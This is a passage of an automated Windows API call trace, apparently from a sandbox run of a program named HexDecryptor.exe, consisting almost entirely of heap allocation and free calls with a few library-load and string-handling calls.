(HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0161.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0161.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0161.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0161.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0161.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0161.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0161.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0161.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0161.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0161.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0161.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0161.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0161.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0161.548] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0161.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0161.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0161.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0161.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0161.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0161.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0161.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0161.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0161.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0161.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0161.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0161.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0161.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0161.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0161.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0161.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0161.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0161.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0161.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0161.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0161.549] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HexDecryptor.exe", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe771de0e, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xe771de0e, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd4adbe4a, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x2f600, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="HexDecryptor.exe", cAlternateFileName="HEXDEC~1.EXE")) returned 0xa87250 [0161.549] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0161.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0161.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0161.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0161.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0161.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0161.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0161.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0161.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0161.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.550] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0161.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0161.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0161.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0161.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0161.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0161.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0161.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0161.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0161.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0161.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0161.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0161.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0161.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0161.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0161.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0161.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0161.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0161.672] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0161.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0161.672] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0161.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0161.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0161.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0161.672] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0161.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0161.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0161.672] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0161.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0161.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0161.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0161.673] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0161.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0161.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0161.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0161.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0161.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0161.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0161.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0161.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0161.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0161.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0161.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0161.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0161.673] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0161.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0161.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0161.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0161.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0161.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0161.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0161.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0161.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0161.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0161.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0161.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0161.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0161.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0161.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0161.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0161.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0161.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0161.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0161.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0161.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0161.674] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0161.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0161.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0161.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0161.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0161.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0161.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0161.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0161.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0161.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0161.675] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0161.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0161.676] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0161.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0161.676] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0161.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0161.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0161.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0161.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0161.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0161.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0161.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0161.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0161.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0161.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0161.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0161.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0161.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0161.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0161.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0161.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0161.677] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0161.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0161.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0161.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0161.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0161.677] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0161.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0161.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0161.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0161.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0161.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0161.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0161.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0161.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0161.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0161.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0161.678] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0161.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0161.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0161.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0161.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0161.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0161.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0161.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0161.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0161.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0161.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0161.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0161.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0161.678] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0161.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0161.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0161.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0161.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0161.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0161.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0161.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0161.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0161.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0161.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0161.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0161.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0161.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0161.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0161.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0161.679] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0161.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0161.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0161.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0161.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0161.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0161.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0161.680] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.680] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0161.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0161.680] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0161.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0161.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0161.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0161.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0161.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0161.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0161.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0161.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0161.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.681] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0161.681] HeapFree (in: 